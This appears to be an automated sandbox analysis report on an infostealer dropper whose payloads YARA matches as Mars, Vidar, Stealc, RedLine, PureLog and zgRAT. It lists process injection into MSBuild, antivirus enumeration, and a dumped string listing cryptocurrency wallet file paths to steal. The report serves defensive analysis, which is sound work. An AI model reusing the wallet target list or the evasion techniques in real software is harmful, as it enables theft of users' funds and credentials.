Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: EnumSystemLocalesW,	0_2_05B804F8
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: EnumSystemLocalesW,	0_2_05B80412
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: EnumSystemLocalesW,	0_2_05B8045D
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,	0_2_05B807D3
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,	0_2_05B807D5
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,	0_2_05B7774B
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_05B8019A
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_05B808FE
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: EnumSystemLocalesW,	0_2_05B77358
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_05B80AD2
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: GetLocaleInfoW,	0_2_05B80A05
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Code function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Code function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe

Code function: 2_2_001E2DA6 _memset,GetVersionExW,

2_2_001E2DA6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 1.3.u5ek.0.exe.5b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5ek.0.exe.5b60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.40a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101749f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101eeb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2111483520.0000027276AEB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3488, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.u5ek.0.exe.5b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5ek.0.exe.5b60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5ek.0.exe.40a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
